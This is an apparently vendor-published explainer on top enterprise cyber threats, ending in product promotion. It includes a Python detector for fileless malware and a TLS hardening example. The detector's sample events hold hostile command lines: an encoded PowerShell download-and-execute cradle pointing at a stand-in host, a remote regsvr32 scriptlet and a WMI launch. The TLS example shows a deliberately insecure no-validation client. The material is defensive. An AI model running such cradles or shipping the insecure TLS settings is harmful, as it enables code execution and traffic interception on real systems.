The cyber threat landscape is constantly evolving. As cyberattackers become more skilled and organized, their attacks are becoming more sophisticated as well.
Today, organizations face generation V and VI cyber threats. These attackers are aware of the improvements made in enterprise cybersecurity in recent years and have tailored their attacks to bypass and overcome traditional defenses. The modern cyber attack is multi-vector and uses polymorphic code to evade signature-based detection. As a result, threat detection and response is more difficult than ever before.
To add to the challenge, many organizations are facing a sudden and dramatic shift in how they perform “business as usual”. The COVID-19 pandemic drove many organizations to adopt a mostly or wholly remote workforce, often without adequate preparation. For organizations whose security strategy depended on employees working from the office, adapting to this new way of life is a challenge.
In the remote work world, the endpoint is cybercriminals’ primary target and an organization’s first line of defense. Securing the remote workforce requires that organizations understand the top cyber threats their employees face and have endpoint security solutions in place that are capable of detecting, preventing, and remediating these attacks.
Cybercriminals are constantly innovating, and the top cyber threats that organizations face change regularly as attackers adapt to changing circumstances. Check Point Research continually tracks the trends and changes in the cyber threat landscape, and the following are the threats organizations should currently be most concerned about.
Ransomware is malware that uses encryption to extort a ransom from its victim. Once present on a system, it encrypts the user's files and demands payment in exchange for the decryption key. Because modern encryption algorithms cannot be broken by brute force with available computing power, the only ways to recover the files are to restore them from a backup (if one exists), to pay the ransom demand, or, in the minority of cases where the malware's cryptography was implemented badly, to use a decryptor built by researchers.
Ransomware has become one of the most visible and prolific types of malware, and the COVID-19 pandemic provided an environment in which it has thrived. In recent years, some ransomware variants have also evolved to perform “double extortion” attacks: Maze, Sodinokibi/REvil, DoppelPaymer, Nemty, and other families steal copies of files before encrypting them and threaten to publish the stolen data if the victim refuses to pay. This means that a clean backup no longer neutralizes the attack on its own. The trend began in late 2019 with Maze and continued to grow as more groups adopted it throughout 2020.
Ransomware is a type of malware but far from the only type. Malware comes in a variety of different forms and can be used to achieve a number of different objectives. Malware variants may be designed to do anything from collecting and stealing sensitive information to presenting unwanted ads to causing permanent damage to an infected machine.
The most common types of malware vary from one year to another as different types of attacks become more or less profitable to attackers. In 2020, the most common forms of malware included:
While the list of the “top six” types of malware remains constant worldwide, the percentage of malware of each type varies from one geographic region to another.
For example, as described in Check Point’s Cyber Attack Trends: 2020 Mid-Year Report, the EMEA region is the only one where botnet malware is more common than malware targeting mobile devices. Across other regions, the rankings remain constant but the relative percentages can vary.
Antivirus solutions commonly detect malware on a device by inspecting each file on disk for signs of malicious content. Fileless malware is designed to bypass this approach by never writing a malicious executable to disk. Instead, the malicious logic runs in memory using tools and interpreters that are already present on the host, such as PowerShell, Windows Management Instrumentation (WMI), or the Windows script hosts, and any persistence is tucked into places like the registry or scheduled tasks rather than into a file. This lets the malware achieve the same objectives while evading defenses that only scan files.
Apart from the absence of a file on disk, fileless malware performs many of the same functions as traditional malware. For example, FritzFrog, a fileless peer-to-peer (P2P) botnet first reported in August 2020, brute-forces its way into SSH servers, runs entirely in memory, and mines cryptocurrency on the systems it infects.
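To make the preceding description concrete, here is an added example (written for this page, not code from Check Point or from any product it mentions) of the kind of detection logic an endpoint sensor or SIEM rule applies to process-creation telemetry to catch fileless tradecraft: an Office application spawning PowerShell with a hidden window and a base64 -EncodedCommand, a regsvr32 scriptlet fetched over HTTP, and WMI used to launch a script host. The events are constructed Sysmon-style records, the encoded payload is generated inside the script, and the indicator names, weights and threshold are assumptions chosen for illustration; decoding the -EncodedCommand argument (UTF-16LE, then base64) and the living-off-the-land patterns themselves are the standard ones.

```python
import base64
import re

# Constructed sample process-creation events in Sysmon-style fields. None of
# this is real telemetry. The encoded PowerShell payload is built right here so
# the sample is a faithful -EncodedCommand (UTF-16LE text, base64 encoded).
CRADLE_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED_CRADLE = base64.b64encode(CRADLE_PLAINTEXT.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\report.txt"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {ENCODED_CRADLE}"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic.exe process call create powershell -nop -c iex (gc C:\Users\Public\a.txt)"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the base64 blob follows it.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Indicator name -> (pattern, weight). Weights are illustrative, not a vendor scheme.
# Patterns run over the raw command line plus the decoded payload, so base64
# encoding does not hide a download cradle or Invoke-Expression.
INDICATORS = {
    "encoded_command":    (ENCODED_RE, 1),
    "hidden_window":      (re.compile(r"(?i)-w(?:in(?:dowstyle)?)?\s+hidden"), 1),
    "download_cradle":    (re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"), 2),
    "invoke_expression":  (re.compile(r"(?i)\biex\b|invoke-expression"), 1),
    "lolbin_scriptlet":   (re.compile(r"(?i)regsvr32.*/i:https?:|mshta\s+(?:https?:|vbscript:|javascript:)"), 3),
    "wmi_process_create": (re.compile(r"(?i)wmic.*process\s+call\s+create"), 2),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "wmic.exe"}
OFFICE_SPAWN_WEIGHT = 3


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Score one process-creation event and list the indicators that fired."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline}\n{decoded}"
    hits = {name: weight for name, (rx, weight) in INDICATORS.items() if rx.search(text)}
    # Parent/child relationship is often the strongest signal: Office should not spawn script hosts.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits["office_spawns_script_host"] = OFFICE_SPAWN_WEIGHT
    return {"image": image, "parent": parent, "decoded": decoded,
            "indicators": sorted(hits), "score": sum(hits.values())}


def scan_events(events, threshold=3):
    """Return analyses of the events whose weighted score reaches the threshold."""
    return [r for r in map(analyze_event, events) if r["score"] >= threshold]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(f"{finding['score']:>2}  {finding['parent']} -> {finding['image']}: "
              f"{', '.join(finding['indicators'])}")
        if finding["decoded"]:
            print(f"    decoded payload: {finding['decoded']}")
```

Run against the constructed events, the notepad and svchost launches score zero and the three living-off-the-land launches are reported; the Word-spawned PowerShell line is the clearest, because the decoded payload exposes the download cradle that the base64 argument was hiding. In production the same logic would sit on Sysmon Event ID 1 or PowerShell script block logs (Event ID 4104), and the weights would be tuned against the organization's own baseline of legitimate encoded-command use.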
Phishing is one of the most common methods that attackers use to gain access to a target system. Often, it is easier to trick a user into clicking on a malicious link or opening an attachment than it is to locate and successfully exploit a vulnerability in an organization’s network. Phishing attacks can achieve a variety of goals, including credential theft, malware delivery, financial fraud, and theft of sensitive data.
Phishing has historically been the most common method for cyberattackers to launch a campaign due to its ease of use and high success rate. During the COVID-19 pandemic, this trend only accelerated as cybercriminals took advantage of employees working from outside the office and the climate of uncertainty regarding the virus.
The COVID-19 pandemic also amplified the effect of common phishing lures. For example, Black Friday and Cyber Monday are a commonly exploited pretext for phishers, and the rise in online shopping due to COVID-19 made it especially effective in 2020. As a result, the volume of phishing emails doubled in the weeks leading up to Black Friday and Cyber Monday compared to the beginning of the previous month.
Many network protocols protect against eavesdroppers with encryption, which makes the traffic unreadable to anyone who merely observes it. A Man-in-the-Middle (MitM) attack bypasses this protection by splitting the connection in two: the attacker terminates the client's encrypted connection itself and opens a separate encrypted connection to the server. Holding the keys for both legs, the attacker can read the data passing through and modify it as desired before forwarding it on to its destination. The attack only succeeds if the client fails to authenticate the party it is actually talking to.
Protocols like HTTPS defeat MitM attacks only when the client validates the server's certificate against a trusted authority and checks that it matches the expected hostname. The rise of mobile makes this a more dangerous attack vector: mobile apps give their users little or no visibility into their network connections, and some disable certificate validation, trust any certificate, or fall back to plaintext protocols, all of which leave them open to MitM attacks.
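The following added example (not from the original page or from any Check Point product) shows, with Python's standard ssl module, the weak client configuration that makes the MitM scenario above possible next to the hardened one, and layers a certificate-pin check on top of ordinary validation. It goes slightly beyond the text by applying to desktop clients as well as mobile apps, since the failure is the same in both. SAMPLE_DER is a constructed byte string standing in for a DER certificate, used only to exercise the pin comparison; the function names and the pin format are this example's own choices.

```python
import base64
import hashlib
import socket
import ssl

# Constructed stand-in for a DER-encoded server certificate. It is not a real
# certificate and only serves to exercise the pin comparison below.
SAMPLE_DER = b"\x30\x82\x01\x00" + bytes(range(256))


def insecure_context():
    """The weak client configuration: no CA validation and no hostname check.
    Any certificate, including one minted on the fly by an interception proxy,
    is accepted, so an attacker holding both legs of the connection reads everything."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be disabled before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_context():
    """Validate the chain against the system trust store, check the hostname,
    and refuse TLS versions below 1.2."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def describe(ctx):
    """The settings that decide whether an interposed endpoint is detected."""
    return {
        "check_hostname": ctx.check_hostname,
        "verify_mode": ctx.verify_mode.name,
        "minimum_version": ctx.minimum_version.name,
    }


def cert_fingerprint(der_cert):
    """SHA-256 of the DER certificate, base64 encoded, in the usual 'sha256/...' pin shape."""
    return "sha256/" + base64.b64encode(hashlib.sha256(der_cert).digest()).decode("ascii")


def check_pin(der_cert, pinned):
    """True if the presented certificate matches one of the operator's pins.
    Pinning defeats a MitM even when the attacker holds a certificate that the
    device's trust store would otherwise accept (a compromised or user-installed CA)."""
    return cert_fingerprint(der_cert) in set(pinned)


def connect_pinned(host, port, pinned, timeout=5.0):
    """Open a fully validated TLS connection, then additionally enforce the pin.
    Returns (negotiated protocol version, fingerprint). Needs network access."""
    ctx = hardened_context()
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)
            if not check_pin(der, pinned):
                raise ssl.SSLCertVerificationError(
                    f"{host}: certificate {cert_fingerprint(der)} is not in the pin set")
            return tls.version(), cert_fingerprint(der)


if __name__ == "__main__":
    print("weak    :", describe(insecure_context()))
    print("hardened:", describe(hardened_context()))
    pin = cert_fingerprint(SAMPLE_DER)
    print("pin check (matching)  :", check_pin(SAMPLE_DER, {pin}))
    print("pin check (mismatched):", check_pin(SAMPLE_DER, {"sha256/AAAA"}))
```

The point of describe() is that the two settings it reports are exactly what to look for when reviewing an app's networking code: a client with check_hostname off or verify_mode set to CERT_NONE will happily complete a handshake with an interception proxy, and no amount of strong ciphers on the wire helps. Pins must be rotated with the certificate, so production code keeps a backup pin for the next key as well.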
Many organizations focus their cybersecurity efforts on computers, but mobile devices are a growing threat to an organization’s cybersecurity. As employees increasingly use mobile devices to do their work and access sensitive company data, malicious mobile applications are increasingly dangerous. These applications can do anything that desktop malware can, including stealing sensitive data, encrypting files with ransomware, and more.
In 2020, mobile malware was the second most common type of malware worldwide. The most common mobile malware variants – including xHelper, PreAMo, and Necro – are all Trojans with additional functionality, including ad fraud and click fraud. Mobile malware commonly takes advantage of vulnerabilities in mobile operating systems, like the remote code execution (RCE) vulnerability fixed in a batch of 43 Android security patches in January 2021.
Organizations’ IT infrastructure and services – like web applications, email, etc. – are critical to their ability to do business. Denial of Service (DoS) attacks are designed to deny access to critical services. This can be accomplished by exploiting a vulnerability in an application (causing it to crash) or by flooding a system with more data or requests than it is able to manage (rendering it unable to handle legitimate requests). In some cases, attackers will perform a ransom DoS attack where a ransom payment is demanded to either stop an ongoing attack or prevent a threatened one.
During the remote work and learning driven by the COVID-19 pandemic, remote access solutions were a major target of DoS attacks. And during the 2020-2021 school year, Distributed DoS (DDoS) attacks against the education sector increased dramatically. These attacks attempted to render remote learning services unusable or solicited ransoms to prevent or stop the attacks.
Software contains weaknesses and vulnerabilities, and many of them reach production, where they are potentially exploitable by attackers. Production vulnerabilities may be discovered internally by the vendor, by external security researchers, or by cyberattackers.
In the third case, the vulnerability is a “zero day”: attackers are exploiting it while the vendor has had zero days to produce a fix. Until the vendor releases a patch and the organization applies it, every deployment of the affected software is exposed to attack.
In 2020, one of the most widely exploited vulnerabilities was Zerologon (CVE-2020-1472), a flaw in the Netlogon protocol that affected Windows Domain Controllers (DCs). An attacker with network access to a vulnerable DC could reset its machine account password and take complete control of the Active Directory domain it manages. Strictly speaking, Zerologon was not a zero day: Microsoft released a patch in August 2020, but in-the-wild exploitation began soon after public proof-of-concept code appeared and before many organizations had patched, prompting CISA to issue an emergency directive requiring US federal agencies to apply the patch immediately.
This list of top threats is not exhaustive and does not cover all active threats to enterprise cybersecurity. Examples of other common cybersecurity threats include:
While these potential attacks do not make the list of the most common and dangerous cyber threats, they still pose a significant risk. Enterprise security solutions should include the ability to detect, prevent, and remediate attacks using these vectors as well.
Enterprise cybersecurity has grown more difficult with the surge in remote work driven by COVID-19. Instead of a mostly on-site workforce, security teams now need to protect employees working from home (potentially on personally-owned devices).
These systems, connected directly to home networks and the public Internet rather than sitting behind the corporate perimeter, are more exposed to attack. As a result, endpoint security, on computers and mobile devices alike, is an even greater priority for enterprise cybersecurity than before.
With the wide range of potential cybersecurity threats, organizations require an endpoint detection and response solution capable of detecting and protecting all of their employees’ devices against top cyber threats. To learn about the features that you should be looking for in an endpoint security platform, check out these buyer’s guides for endpoint protection and mobile device security.
Check Point SandBlast Agent and SandBlast Mobile offer comprehensive endpoint & mobile protection for an organization’s entire remote workforce. This includes protection against malware, web-based attacks, and other top cybersecurity risks. To see for yourself how Check Point SandBlast Agent and SandBlast Mobile can protect your organization against cyber threats, request a free demo.